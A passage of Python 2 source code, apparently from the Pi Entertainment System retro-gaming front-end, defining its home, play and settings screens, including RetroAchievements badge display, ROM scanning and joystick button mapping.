t = ThumbnailPanel(self.renderer, self.screenRect[0] + self.screenMargin, self.__recentlyAddedLabel.y + self.__recentlyAddedLabel.height + self.__thumbYGap, self.screenRect[2] - self.screenMargin, games, self.app.smallBodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.__thumbXGap, True, self.__showThumbs)
t.loadTextures()
self.__recentlyAddedThumbPanels[consoleName] = self.addUiObject(t)
else:
self.__recentlyAddedThumbPanels[consoleName].setGames(games)
self.menu.setSelected(0, deselectAll=True)
self.__gamesAdded = self.app.getGameTotal() > 0
if self.__gamesAdded and self.app.achievementUser:
self.updateRecentBadges()
else:
if self.__gamesAdded:
self.__welcomeText = self.__gamesAddedWelcomeText
else:
self.__welcomeText = self.__noGamesAddedWelcomeText
self.update()
def stop(self):
super(HomeScreen, self).stop()
logging.debug("HomeScreen.stop: deleting textures...")
sdl2.SDL_DestroyTexture(self.__consoleTexture)
def update(self):
selected = self.menu.getSelectedItem()
if isinstance(selected, ConsoleMenuItem):
console = selected.getConsole()
self.__consoleName = console.getName()
if self.__consoleTexture:
sdl2.SDL_DestroyTexture(self.__consoleTexture)
self.__consoleTexture = sdl2.SDL_CreateTextureFromSurface(self.renderer, self.app.consoleSurfaces[self.__consoleName])
sdl2.SDL_SetTextureAlphaMod(self.__consoleTexture, CONSOLE_TEXTURE_ALPHA)
self.__headerLabel.setText(self.__consoleName)
if self.__consoleName in self.__recentlyPlayedThumbPanels:
self.__recentlyPlayedLabel.y = self.__recentlyAddedThumbPanels[self.__consoleName].y + self.__recentlyAddedThumbPanels[self.__consoleName].height + 50
self.__recentlyPlayedLabel.setVisible(True)
self.__recentlyPlayedThumbPanels[self.__consoleName].setCoords(self.__recentlyPlayedThumbPanels[self.__consoleName].x, self.__recentlyPlayedLabel.y + self.__recentlyPlayedLabel.height + self.__thumbYGap)
else:
self.__recentlyPlayedLabel.setVisible(False)
self.__consoleSelected = True
else:
self.__consoleSelected = False
selectedText = selected.getText()
if selectedText == "Home":
self.__headerLabel.setText("Welcome to PES!")
self.__descriptionLabel.setText(self.__welcomeText, True)
elif selectedText == "Kodi":
self.__headerLabel.setText("Kodi")
self.__descriptionLabel.setText("Launch Kodi, the award winning media centre application.")
elif selectedText == "Reboot":
self.__headerLabel.setText("Reboot")
self.__descriptionLabel.setText("Select this menu item to reboot your system.", True)
elif selectedText == "Reload":
self.__headerLabel.setText("Reload")
self.__descriptionLabel.setText("Select this menu item to reload the PES GUI - handy if you have edited any config files.", True)
elif selectedText == "Exit":
self.__headerLabel.setText("Exit")
self.__descriptionLabel.setText("Select this menu item to exit the PES GUI and return to the command line.", True)
elif selectedText == "Settings":
self.__headerLabel.setText("Settings")
self.__descriptionLabel.setText("Select this menu item to customise PES and to add ROMs to PES' database.", True)
elif selectedText == "Power Off":
self.__headerLabel.setText("Power Off")
self.__descriptionLabel.setText("Select this menu item to power off your system.", True)
def updateRecentBadges(self):
if self.__gamesAdded and self.app.achievementUser:
logging.debug("HomeScreen.updateRecentBadges: updating...")
self.__welcomeText = "Welcome to PES %s.\n\nPoints: %d\nRank: %d" % (self.app.achievementUser.getName(), self.app.achievementUser.getTotalPoints(), self.app.achievementUser.getRank())
for b in self.__badgePanels:
self.removeUiObject(b)
b.destroy()
self.__badgePanels = []
badges = self.app.achievementUser.getRecentBadges(10)
if len(badges) == 0:
self.__welcomeText += "\n\nNo recent badges.\n\nYou may want to go to \"Update Badges\" under the \"Settings\" menu."
else:
self.__welcomeText += "\n\nYour recent badges:\n"
self.__descriptionLabel.setText(self.__welcomeText, True)
x = self.screenRect[0] + self.screenMargin
y = self.__descriptionLabel.y + self.__descriptionLabel.height + 20
width = self.screenRect[2] - (self.screenMargin * 2)
for b in badges:
badgePanel = self.addUiObject(BadgePanel(self.app.renderer, x, y, width, self.app.bodyFont, self.app.smallBodyFont, self.app.textColour, self.app.lightBackgroundColour, self.app.menuSelectedBgColour, b))
self.__badgePanels.append(badgePanel)
y += badgePanel.height + 10
if y + badgePanel.height > self.screenRect[1] + self.screenRect[3]:
break
class PlayScreen(Screen):
def __init__(self, app, renderer, menuRect, screenRect, game):
super(PlayScreen, self).__init__(app, renderer, "Play", Menu([MenuItem("Play", False, False, self.__play), MenuItem("Browse")]), menuRect, screenRect)
self.__game = game
self.__consoleTexture = None
self.__titleLabel = None
self.__consoleName = None
self.__achievementsList = None
logging.debug("PlayScreen.init: intialised")
def drawScreen(self):
super(PlayScreen, self).drawScreen()
sdl2.SDL_RenderCopy(self.renderer, self.__consoleTexture, None, sdl2.SDL_Rect(self.screenRect[0], self.screenRect[1], self.screenRect[2], self.screenRect[3]))
self.__titleLabel.draw()
self.__achievementsList.draw()
def __play(self):
self.app.playGame(self.__game)
def processEvent(self, event):
super(PlayScreen, self).processEvent(event)
if not self.menuActive and not self.justActivated:
if self.menu.getSelectedItem().getText() == "Browse":
self.__achievementsList.setFocus(True)
self.__achievementsList.processEvent(event)
elif self.__achievementsList.hasFocus():
self.__achievementsList.setFocus(False)
elif self.__achievementsList.hasFocus():
self.__achievementsList.setFocus(False)
def setGame(self, game):
if game == self.__game:
return
achievementGame = self.app.achievementUser.getGame(game.getAchievementApiId())
if achievementGame == None:
logging.error("PlayScreen.setGame: could not find a game with achievement_api_id = %d" % game.getAchievementApiId())
self.app.exit(1)
self.__game = game
consoleName = game.getConsole().getName()
titleStr = "Game: %s\nProgress: %d%%\nPoints: %d of %d awarded" % (game.getName(), achievementGame.getPercentComplete(), achievementGame.getUserPointsTotal(), achievementGame.getScoreTotal())
if self.__titleLabel == None:
self.__titleLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.screenRect[1], titleStr,
self.app.titleFont, self.app.textColour, fixedWidth=self.wrap))
else:
self.__titleLabel.setText(titleStr, True)
if self.__consoleTexture == None:
self.__consoleTexture = sdl2.SDL_CreateTextureFromSurface(self.renderer, self.app.consoleSurfaces[consoleName])
sdl2.SDL_SetTextureAlphaMod(self.__consoleTexture, CONSOLE_TEXTURE_ALPHA)
elif self.__consoleName != consoleName:
sdl2.SDL_DestroyTexture(self.__consoleTexture)
self.__consoleTexture = sdl2.SDL_CreateTextureFromSurface(self.renderer, self.app.consoleSurfaces[consoleName])
sdl2.SDL_SetTextureAlphaMod(self.__consoleTexture, CONSOLE_TEXTURE_ALPHA)
self.__consoleName = consoleName
menu = Menu([])
badges = achievementGame.getBadges()
for b in badges:
menu.addItem(DataMenuItem(b, False, False, self.__play))
if self.__achievementsList == None:
y = self.__titleLabel.y + self.__titleLabel.height + 10
self.__achievementsList = self.addUiObject(IconPanelList(self.renderer, self.__titleLabel.x, y, self.screenRect[2] - (self.screenMargin * 2), self.screenRect[3] - y - self.screenMargin, menu, self.app.bodyFont, self.app.smallBodyFont, self.app.textColour, self.app.textColour, None, self.app.menuSelectedBgColour, List.SCROLLBAR_AUTO, True, False))
else:
self.__achievementsList.setMenu(menu)
class JoystickPromptMap(object):
BUTTON = 1
AXIS = 2
HAT = 3
AXIS_POSITIVE = 1
AXIS_NEGATIVE = -1
def __init__(self, prompt, sdlName):
self.__prompt = prompt
self.__sdlName = sdlName
self.reset()
def getPrompt(self):
return "Press: %s" % self.__prompt
def getInputTypeAsString(self):
if self.__inputType == None:
return "None"
if self.__inputType == self.BUTTON:
return "Button"
if self.__inputType == self.HAT:
return "Hat"
if self.__inputType == self.AXIS:
return "Axis"
return "Unknown!"
def getMap(self):
if self.__inputType == self.BUTTON:
return "%s:b%s" % (self.__sdlName, self.__value)
if self.__inputType == self.AXIS:
axis, value = self.__value
return "%s:a%s" % (self.__sdlName, axis)
if self.__inputType == self.HAT:
hat, value = self.__value
return "%s:h%s.%s" % (self.__sdlName, hat, value)
return None
def getValue(self):
return self.__value
def getValueAsString(self):
if self.__inputType == self.HAT:
return "(Hat: %d %d)" % (self.__value[0], self.__value[1])
if self.__inputType == self.AXIS:
return "(Axis: %d %d)" % (self.__value[0], self.__value[1])
return "%s" % self.__value
def getType(self):
return self.__inputType
def reset(self):
self.__value = None
self.__inputType = None
def setValue(self, inputType, value):
self.__inputType = inputType
self.__value = value
logging.debug("JoystickPromptMap.setValue: name: %s, type: %s, value: %s" % (self.__sdlName, self.getInputTypeAsString(), self.getValueAsString()))
class SettingsScreen(Screen):
def __init__(self, app, renderer, menuRect, screenRect):
super(SettingsScreen, self).__init__(app, renderer, "Settings", Menu([
MenuItem("Update Games"),
MenuItem("Update Badges"),
MenuItem("Joystick Set-Up"),
MenuItem("Audio"),
MenuItem("Gameplay")]),
menuRect, screenRect)
if self.app.currentTimezone != None:
self.menu.addItem(MenuItem("Timezone"))
self.menu.addItem(MenuItem("Reset Database", False, False, app.resetDatabase))
self.menu.addItem(MenuItem("Reset Config", False, False, app.resetConfig))
self.menu.addItem(MenuItem("About"))
self.__hardcoreModeMenuItem = MenuItem("Hardcore mode", True, True)
self.__hardcoreModeMenuItem.toggle(self.app.config.retroAchievementsHardcore)
self.__init = True
self.__updateDatabaseMenu = Menu([])
for c in self.app.consoles:
self.__updateDatabaseMenu.addItem(ConsoleMenuItem(c, False, True))
self.__toggleMargin = 20
self.__updateDbThread = None
self.__updateAchievementsThread = None
self.__scanProgressBar = None
self.__defaultHeaderText = "Settings"
self.__headerLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.screenRect[1], self.__defaultHeaderText, self.app.titleFont, self.app.textColour))
logging.debug("SettingsScreen.init: initialised")
self.__initText = "Here you can scan for new games, sync your badges with www.retroachievements.org, set-up your joysticks as well as being able to reset PES to its default settings\n\nPlease select an item from the menu on the left."
self.__scanText = "Please use the menu below to select which consoles you wish to include in your search. By default all consoles are selected. Use the SELECT button to toggle the items in the menu.\n\nWhen you are ready, please select the \"Begin Scan\" button."
self.__descriptionLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.__headerLabel.y + (self.__headerLabel.height * 2), self.__initText, self.app.bodyFont, self.app.textColour, fixedWidth=self.screenRect[2] - self.screenMargin))
self.__consoleList = None
self.__scanButton = None
self.__selectAllButton = None
self.__deselectAllButton = None
self.__gameplaySaveButton = None
self.__audioSaveButton = None
self.__gamepadLayoutIcon = None
self.__jsIndex= None
self.__jsName = None
self.__jsPromptLabel = None
self.__jsPrompts = [
JoystickPromptMap("Start", "start"),
JoystickPromptMap("Select", "back"),
JoystickPromptMap("Up", "dpup"),
JoystickPromptMap("Down", "dpdown"),
JoystickPromptMap("Left", "dpleft"),
JoystickPromptMap("Right", "dpright"),
JoystickPromptMap("A", "a"),
JoystickPromptMap("B", "b"),
JoystickPromptMap("X", "x"),
JoystickPromptMap("Y", "y"),
JoystickPromptMap("L1", "leftshoulder"),
JoystickPromptMap("R1", "rightshoulder"),
JoystickPromptMap("L2", "lefttrigger"),
JoystickPromptMap("R2", "righttrigger"),
JoystickPromptMap("Left Axis Vertical", "lefty"),
JoystickPromptMap("Left Axis Horizontal", "leftx"),
JoystickPromptMap("Right Axis Vertical", "righty"),
JoystickPromptMap("Right Axis Horizontal", "rightx"),
JoystickPromptMap("Guide/Home", "guide")
]
self.__jsPromptLen = len(self.__jsPrompts)
self.__jsPrompt = 0
self.__joysticks = []
self.__ignoreJsEvents = True
self.__jsTimerTick = 0
self.__jsTimerLabel = None
self.__jsTimeOut = 10
self.__jsTimeRemaining = self.__jsTimeOut
self.__jsInitialAxis = []
self.__jsLastButton = None
self.__jsLastAxis = None
self.__jsLastHat = None
self.__jsLastHatValue = None
self.__jsLastEventTick = 0
self.__isBusy = False
self.__timezoneList = None
self.__gameplayList = None
self.__audioList = None
def drawScreen(self):
super(SettingsScreen, self).drawScreen()
currentX = self.screenRect[0] + self.screenMargin
currentY = self.screenRect[1]
self.__headerLabel.draw()
self.__descriptionLabel.draw()
if self.__init:
return
selected = self.menu.getSelectedItem().getText()
if selected == "Update Games":
if self.__updateDbThread != None:
if self.__updateDbThread.started and not self.__updateDbThread.done:
self.__descriptionLabel.setText("Scanned %d out of %d roms... press BACK to abort\n\nElapsed: %s\n\nRemaining: %s\n\nProgress:" % (self.__updateDbThread.getProcessed(), self.__updateDbThread.romTotal, self.__updateDbThread.getElapsed(), self.__updateDbThread.getRemaining()), True)
self.__scanProgressBar.y = self.__descriptionLabel.y + self.__descriptionLabel.height + 10
self.__scanProgressBar.setProgress(self.__updateDbThread.getProgress())
self.__scanProgressBar.draw()
elif self.__updateDbThread.done:
interruptedStr = ""
if self.__updateDbThread.interrupted:
interruptedStr = "(scan interrupted)"
self.__descriptionLabel.setText("Scan completed in %s %s\n\nAdded: %d\n\nUpdated: %d\n\nDeleted: %d\n\nPress BACK to return to the previous screen." % (self.__updateDbThread.getElapsed(), interruptedStr, self.__updateDbThread.added, self.__updateDbThread.updated, self.__updateDbThread.deleted), True)
self.__isBusy = False
else:
self.__consoleList.draw()
self.__scanButton.draw()
self.__selectAllButton.draw()
self.__deselectAllButton.draw()
elif selected == "Update Badges":
if self.app.retroAchievementConn:
if self.__updateAchievementsThread != None:
if self.__updateAchievementsThread.started and not self.__updateAchievementsThread.done:
self.__descriptionLabel.setText("Processed %d out of %d games... press BACK to abort\n\nElapsed: %s\n\nRemaining: %s\n\nProgress:" % (self.__updateAchievementsThread.getProcessed(), self.__updateAchievementsThread.getTotal(), self.__updateAchievementsThread.getElapsed(), self.__updateAchievementsThread.getRemaining()), True)
self.__scanProgressBar.y = self.__descriptionLabel.y + self.__descriptionLabel.height + 10
self.__scanProgressBar.setProgress(self.__updateAchievementsThread.getProgress())
self.__scanProgressBar.draw()
elif self.__updateAchievementsThread.done:
interruptedStr = ""
if self.__updateAchievementsThread.interrupted:
interruptedStr = "(scan interrupted)"
self.__descriptionLabel.setText("Scan completed in %s %s\n\nProcessed %d badges\n\nPress BACK or HOME to continue." % (self.__updateAchievementsThread.getElapsed(), interruptedStr, self.__updateAchievementsThread.getBadgeTotal()), True)
self.__isBusy = False
self.__descriptionLabel.draw()
elif selected == "Timezone":
self.__descriptionLabel.draw()
if self.__timezoneList:
self.__timezoneList.draw()
elif selected == "Gameplay":
self.__descriptionLabel.draw()
if self.__gameplayList:
self.__gameplayList.draw()
if self.__gameplaySaveButton:
self.__gameplaySaveButton.draw()
elif selected == "Audio":
self.__descriptionLabel.draw()
if self.__audioList:
self.__audioList.draw()
if self.__audioSaveButton:
self.__audioSaveButton.draw()
elif selected == "Joystick Set-Up":
if self.__jsTimeRemaining > -1 and self.__jsPrompt < self.__jsPromptLen:
tick = sdl2.SDL_GetTicks()
poll = self.__jsPrompt > 0
if tick - self.__jsTimerTick > 1000:
self.__jsTimerTick = tick
self.__jsTimeRemaining -= 1
self.__jsTimerLabel.setText("Timeout in: %ds" % self.__jsTimeRemaining)
if self.__jsTimeRemaining == 0:
# trigger back event
e = sdl2.SDL_Event()
e.type = sdl2.SDL_KEYDOWN
e.key.keysym.sym = sdl2.SDLK_BACKSPACE
sdl2.SDL_PushEvent(e)
self.__jsTimeRemaining = -1
poll = False
if poll:
# check buttons
value = None
js = self.__joysticks[self.__jsIndex]
for i in xrange(sdl2.SDL_JoystickNumButtons(js)):
if sdl2.SDL_JoystickGetButton(js, i) == 1 and sdl2.SDL_GetTicks() - self.__jsLastEventTick > 500:
value = i
self.__jsLastButton = value
self.__jsLastEventTick = sdl2.SDL_GetTicks()
break
if value != None:
self.__jsTimeRemaining = self.__jsTimeOut
if value == self.__jsPrompts[0].getValue():
logging.debug("SettingsScreen.draw: skipping button %s" % self.__jsPrompts[self.__jsPrompt].getPrompt())
self.__jsPrompt += 1
if self.__jsPrompt < self.__jsPromptLen:
self.__jsPromptLabel.setText(self.__jsPrompts[self.__jsPrompt].getPrompt())
else:
btnOk = True
# have we already used this button value?
for p in self.__jsPrompts:
if p.getType() == JoystickPromptMap.BUTTON and p.getValue() == value:
logging.warning("SettingsScreen.draw: this button has already been assigned")
btnOk = False
break
if btnOk:
self.__jsPrompts[self.__jsPrompt].setValue(JoystickPromptMap.BUTTON, value)
self.__jsPrompt += 1
if self.__jsPrompt < self.__jsPromptLen:
self.__jsPromptLabel.setText(self.__jsPrompts[self.__jsPrompt].getPrompt())
else:
# do hats
for i in xrange(sdl2.SDL_JoystickNumHats(js)):
hvalue = sdl2.SDL_JoystickGetHat(js, i)
# ignore diagonal hat buttons
if sdl2.SDL_GetTicks() - self.__jsLastEventTick > 500 and hvalue != sdl2.SDL_HAT_CENTERED and hvalue != sdl2.SDL_HAT_RIGHTUP and hvalue != sdl2.SDL_HAT_RIGHTDOWN and hvalue != sdl2.SDL_HAT_LEFTUP and hvalue != sdl2.SDL_HAT_LEFTDOWN and (i != self.__jsLastHat or (i == self.__jsLastHat and hvalue != self.__jsLastHatValue)):
value = hvalue
self.__jsLastHat = i
self.__jsLastHatValue = hvalue
self.__jsLastEventTick = sdl2.SDL_GetTicks()
break
if value != None:
self.__jsTimeRemaining = self.__jsTimeOut
hatOk = True
# have we already assigned this hat?
for p in self.__jsPrompts:
if p.getType() == JoystickPromptMap.HAT:
h, v = p.getValue()
if h == self.__jsLastHat and v == value:
logging.warning("SettingsScreen.draw: this hat has already been assigned")
hatOk = False
break
if hatOk:
self.__jsPrompts[self.__jsPrompt].setValue(JoystickPromptMap.HAT, (self.__jsLastHat, value))
self.__jsPrompt += 1
if self.__jsPrompt < self.__jsPromptLen:
self.__jsPromptLabel.setText(self.__jsPrompts[self.__jsPrompt].getPrompt())
elif sdl2.SDL_GetTicks() - self.__jsLastEventTick > 750:
# check axis
for i in xrange(sdl2.SDL_JoystickNumAxes(js)):
avalue = sdl2.SDL_JoystickGetAxis(js, i)
if (avalue < JOYSTICK_AXIS_MIN or avalue > JOYSTICK_AXIS_MAX) and avalue != self.__jsInitialAxis[i]:
value = i
self.__jsLastAxis = value
self.__jsLastEventTick = sdl2.SDL_GetTicks()
break
if value != None:
self.__jsTimeRemaining = self.__jsTimeOut
axisOk = True
# have we already used this axis value?
for p in self.__jsPrompts:
if p.getType() == JoystickPromptMap.AXIS:
a, v = p.getValue()
if a == value and ((avalue < JOYSTICK_AXIS_MIN and v == JoystickPromptMap.AXIS_NEGATIVE) or (avalue > JOYSTICK_AXIS_MAX and v == JoystickPromptMap.AXIS_POSITIVE)):
logging.warning("SettingsScreen.draw: this axis has already been assigned")
axisOk = False
break
if axisOk:
if avalue < JOYSTICK_AXIS_MIN:
self.__jsPrompts[self.__jsPrompt].setValue(JoystickPromptMap.AXIS, (value, JoystickPromptMap.AXIS_NEGATIVE))
else:
self.__jsPrompts[self.__jsPrompt].setValue(JoystickPromptMap.AXIS, (value, JoystickPromptMap.AXIS_POSITIVE))
self.__jsPrompt += 1
if self.__jsPrompt < self.__jsPromptLen:
self.__jsPromptLabel.setText(self.__jsPrompts[self.__jsPrompt].getPrompt())
if self.__jsPrompt == self.__jsPromptLen:
logging.debug("SettingsScreen.draw: joystick configuration complete!")
self.__jsPromptLabel.setVisible(False)
self.__jsTimerLabel.setVisible(False)
self.__ignoreJsEvents = True
self.app.doJsToKeyEvents = True
errors = []
jsGUID = getJoystickGUIDString(sdl2.SDL_JoystickGetDeviceGUID(self.__jsIndex))
logging.debug("SettingsScreen.draw: creating SDL2 controller mapping using GUID: %s" % jsGUID)
# remove commas from the name
jsName = self.__jsName.replace(",", " ")
jsMap = [jsGUID, jsName]
for p in self.__jsPrompts:
m = p.getMap()
if m:
jsMap.append(m)
jsMapStr = ','.join(jsMap)
logging.debug("SettingsScreen.draw: map: %s" % jsMapStr)
for j in self.__joysticks:
sdl2.SDL_JoystickClose(j)
rtn = sdl2.SDL_GameControllerAddMapping(jsMapStr)
if rtn == 0 or rtn == 1:
logging.debug("SettingsScreen.draw: mapping loaded OK!")
try:
db = GameControllerDb(userGameControllerFile)
db.load()
if db.add(jsMapStr):
db.save()
else:
errors.append("Unable to save control pad mapping to file!")
logging.error("SettingsScreen.draw: unable to add mapping to %s" % userGameControllerFile)
except IOError, e:
logging.error(e)
else:
errors.append("Could not add SDL2 mapping for control pad!")
logging.error("SettingsScreen.draw: SDL_GameControllerAddMapping failed for joystick %d, %s" % (self.__jsIndex, self.__jsName))
if len(errors) == 0:
self.app.updateControlPad(self.__jsIndex)
self.__descriptionLabel.setText("Configuration complete. Please press the BACK button to return to the previous menu.")
else:
self.__descriptionLabel.setText("Configuration failed with the following errors:\n\n%s" % "\n".join(errors))
self.__jsPromptLabel.draw()
self.__jsTimerLabel.draw()
self.__gamepadLayoutIcon.draw()
def isBusy(self):
return self.__isBusy
def processEvent(self, event):
selected = self.menu.getSelectedItem().getText()
oldMenuActive = self.menuActive # store state before parent method changes it!
# don't pass up the event if a games scan is in progress
if event.type == sdl2.SDL_KEYDOWN and selected == "Update Games" and self.__updateDbThread != None:
if event.key.keysym.sym == sdl2.SDLK_BACKSPACE or event.key.keysym.sym == sdl2.SDLK_HOME:
if self.__updateDbThread.started and not self.__updateDbThread.done:
self.setMenuActive(False)
self.__updateDbThread.stop()
elif self.__updateDbThread.done:
self.setMenuActive(False)
self.__updateDbThread = None
self.__descriptionLabel.setText(self.__scanText, True)
self.__scanButton.setFocus(False)
self.__consoleList.setFocus(True)
self.__updateDatabaseMenu.toggleAll(True)
self.__updateDatabaseMenu.setSelected(0)
if event.key.keysym.sym == sdl2.SDLK_HOME:
self.__reset()
return
elif event.type == sdl2.SDL_KEYDOWN and selected == "Update Badges" and self.__updateAchievementsThread != None:
if event.key.keysym.sym == sdl2.SDLK_BACKSPACE or event.key.keysym.sym == sdl2.SDLK_HOME:
if self.__updateAchievementsThread.started and not self.__updateAchievementsThread.done:
self.setMenuActive(False)
self.__updateAchievementsThread.stop()
elif self.__updateAchievementsThread.done:
self.__updateAchievementsThread = None
if event.key.keysym.sym == sdl2.SDLK_HOME:
self.__reset()
super(SettingsScreen, self).processEvent(event)
if oldMenuActive:
if event.type == sdl2.SDL_KEYDOWN and (event.key.keysym.sym == sdl2.SDLK_RETURN or event.key.keysym.sym == sdl2.SDLK_KP_ENTER):
logging.debug("SettingsScreen.processEvent: return key trapped for %s" % selected)
if selected == "Update Games":
self.__headerLabel.setText(selected)
self.__updateDatabaseMenu.toggleAll(True)
self.__descriptionLabel.setText(self.__scanText, True)
if self.__consoleList != None:
self.__consoleList.destroy()
consoleListY = self.__descriptionLabel.y + self.__descriptionLabel.height + 10
self.__consoleList = self.addUiObject(List(self.renderer, self.__descriptionLabel.x + self.__toggleMargin, consoleListY, 300, self.screenRect[3] - consoleListY, self.__updateDatabaseMenu, self.app.bodyFont, self.app.textColour, self.app.textColour, self.app.menuSelectedBgColour, self.app.menuTextColour))
self.__consoleList.setFocus(True)
self.__updateDatabaseMenu.setSelected(0)
if self.__scanButton == None:
self.__scanButton = self.addUiObject(Button(self.renderer, self.__consoleList.x + self.__consoleList.width + 200, self.__consoleList.y, 150, 50, "Begin Scan", self.app.bodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.startScan))
self.__selectAllButton = self.addUiObject(Button(self.renderer, self.__scanButton.x, self.__scanButton.y + self.__scanButton.height + 10, 150, 50, "Select All", self.app.bodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.__updateDatabaseMenu.toggleAll, True))
self.__deselectAllButton = self.addUiObject(Button(self.renderer, self.__scanButton.x, self.__selectAllButton.y + self.__selectAllButton.height + 10, 150, 50, "Deselect All", self.app.bodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.__updateDatabaseMenu.toggleAll, False))
self.__scanButton.setFocus(False)
elif selected == "Update Badges":
if not self.app.retroAchievementConn:
self.__descriptionLabel.setText("To track your achievements in your games, please enter your www.retroachievements.org username, password and API key into \\pes\config\pes\pes.ini or %s and then reload PES." % userPesConfigFile)
else:
self.__descriptionLabel.setText("Preparing to synchronise PES with your www.retroachievements.org account...")
if not self.__updateAchievementsThread:
self.__updateAchievementsThread = RetroAchievementsUpdateThread(self.app.retroAchievementConn, self.app.config.badgeDir)
if self.__scanProgressBar == None:
self.__scanProgressBar = ProgressBar(self.renderer, self.screenRect[0] + self.screenMargin, self.__descriptionLabel.y + self.__descriptionLabel.height + 10, self.screenRect[2] - (self.screenMargin * 2), 40, self.app.lineColour, self.app.menuBackgroundColour)
else:
self.__scanProgressBar.setProgress(0)
self.__isBusy = True
self.__updateAchievementsThread.start()
elif selected == "Timezone":
self.__descriptionLabel.setText("You can change the current timezone from \"%s\" by selecting one from the list below." % self.app.currentTimezone, True)
if self.__timezoneList == None:
menuItems = []
for t in self.app.timezones:
menuItems.append(MenuItem(t, False, False, self.__setTimezone, t))
timezoneMenu = Menu(menuItems)
timezoneListY = self.__descriptionLabel.y + self.__descriptionLabel.height + 10
self.__timezoneList = self.addUiObject(List(self.renderer, self.__descriptionLabel.x + self.__toggleMargin, timezoneListY, 300, self.screenRect[3] - timezoneListY, timezoneMenu, self.app.bodyFont, self.app.textColour, self.app.textColour, self.app.menuSelectedBgColour, self.app.menuTextColour, drawBackground=True))
self.__timezoneList.setFocus(True)
elif selected == "Gameplay":
self.__descriptionLabel.setText("Gameplay settings can be modified below.", True)
if self.__gameplayList == None:
menuItems = []
menuItems.append(self.__hardcoreModeMenuItem)
gamePlayMenu = Menu(menuItems)
gamePlayListY = self.__descriptionLabel.y + self.__descriptionLabel.height + 10
self.__gameplayList = self.addUiObject(List(self.renderer, self.__descriptionLabel.x, gamePlayListY, 300, self.screenRect[3] - gamePlayListY, gamePlayMenu, self.app.bodyFont, self.app.textColour, self.app.textColour, self.app.menuSelectedBgColour, self.app.menuTextColour, graphicalToggle=False))
if self.__gameplaySaveButton == None:
screenDimensions = self.app.getDimensions()
self.__gameplaySaveButton = self.addUiObject(Button(self.renderer, screenDimensions[0] - 160, screenDimensions[1] - 60, 150, 50, "Save", self.app.bodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.saveSettings))
self.__gameplayList.setFocus(True)
elif selected == "Audio":
self.__descriptionLabel.setText("Select the audio device to use.", True)
if self.__audioList == None:
menuItems = []
pcms = alsaaudio.pcms()
pcms.sort()
for a in pcms:
if a != 'null':
m = MenuItem(a, False, True)
if a == self.app.config.audioDevice:
m.toggle(True)
menuItems.append(m)
audioMenu = Menu(menuItems, False)
audioListY = self.__descriptionLabel.y + self.__descriptionLabel.height + 10
self.__audioList = self.addUiObject(List(self.renderer, self.__descriptionLabel.x + self.__toggleMargin, audioListY, 500, self.screenRect[3] - audioListY, audioMenu, self.app.bodyFont, self.app.textColour, self.app.textColour, self.app.menuSelectedBgColour, self.app.menuTextColour, drawBackground=True))
if self.__audioSaveButton == None:
screenDimensions = self.app.getDimensions()
self.__audioSaveButton = self.addUiObject(Button(self.renderer, screenDimensions[0] - 160, screenDimensions[1] - 60, 150, 50, "Save", self.app.bodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.saveSettings))
self.__audioList.setFocus(True)
elif selected == "About":
self.__headerLabel.setText(selected)
self.__descriptionLabel.setText("Pi Entertainment System version %s\n\nReleased: %s\n\nLicense: Licensed under version 3 of the GNU Public License (GPL)\n\nAuthor: %s\n\nContributors: Eric Smith\n\nCover art: theGamesDB.net\n\nDocumentation: http://pes.mundayweb.com\n\nFacebook: https://www.facebook.com/pientertainmentsystem\n\nHelp: pes@mundayweb.com\n\nIP Address: %s" % (VERSION_NUMBER, VERSION_DATE, VERSION_AUTHOR, self.app.ip), True)
elif selected == "Joystick Set-Up":
self.app.doJsToKeyEvents = False
self.__jsIndex = None
self.__jsFirstPass = True
self.__jsTimeRemaining = self.__jsTimeOut
self.__jsPrompt = 0
self.__joysticks = []
self.__jsInitialAxis = []
for p in self.__jsPrompts:
p.reset()
self.__headerLabel.setText(selected)
self.__descriptionLabel.setText("Please make sure all axis are in their reset positions and then press START on the control pad you wish to configure.\n\nYou can abort the configuration process at any point by pressing BACKSPACE or the BACK button on your TV remote.\n\nIf your joystick/control pad does not have a particular button, press START to skip it.", True)
if not self.__jsPromptLabel:
self.__jsPromptLabel = self.addUiObject(Label(self.renderer, self.__descriptionLabel.x, self.__descriptionLabel.y + self.__descriptionLabel.height + 30, self.__jsPrompts[self.__jsPrompt].getPrompt(), self.app.bodyFont, self.app.textColour, fixedWidth=self.screenRect[2] - self.screenMargin))
self.__jsTimerLabel = self.addUiObject(Label(self.renderer, self.__jsPromptLabel.x, self.__jsPromptLabel.y + self.__jsPromptLabel.height + 10, "Timeout in: %ds" % self.__jsTimeRemaining, self.app.bodyFont, self.app.textColour, fixedWidth=self.screenRect[2] - self.screenMargin))
else:
self.__jsPromptLabel.setCoords(self.__descriptionLabel.x, self.__descriptionLabel.y + self.__descriptionLabel.height + 30)
self.__jsPromptLabel.setText(self.__jsPrompts[self.__jsPrompt].getPrompt())
self.__jsPromptLabel.setVisible(True)
self.__jsTimerLabel.setText("Timeout in: %ds" % self.__jsTimeRemaining)
self.__jsTimerLabel.setCoords(self.__jsPromptLabel.x, self.__jsPromptLabel.y + self.__jsPromptLabel.height + 10)
self.__jsTimerLabel.setVisible(True)
if not self.__gamepadLayoutIcon:
try:
img = Image.open(gamepadLayoutImageFile)
imgWidth, imgHeight = img.size
except IOError as e:
logging.error(e)
self.app.exit(1)
self.__gamepadLayoutIcon = self.addUiObject(Icon(self.renderer, self.screenRect[0] + ((self.screenRect[2] - imgWidth) / 2), self.__jsTimerLabel.y + self.__jsTimerLabel.height, imgWidth, imgHeight, gamepadLayoutImageFile, False))
self.__gamepadLayoutIcon.setVisible(True)
joystickTotal = sdl2.joystick.SDL_NumJoysticks()
if joystickTotal > 0:
#logging.debug("PESApp.run: found %d control pads" % joystickTotal)
for i in xrange(joystickTotal):
js = sdl2.SDL_JoystickOpen(i)
self.__joysticks.append(js)
self.__init = False
else:
if selected == "Update Games" and self.__consoleList:
if event.type == sdl2.SDL_KEYDOWN:
if event.key.keysym.sym == sdl2.SDLK_RIGHT:
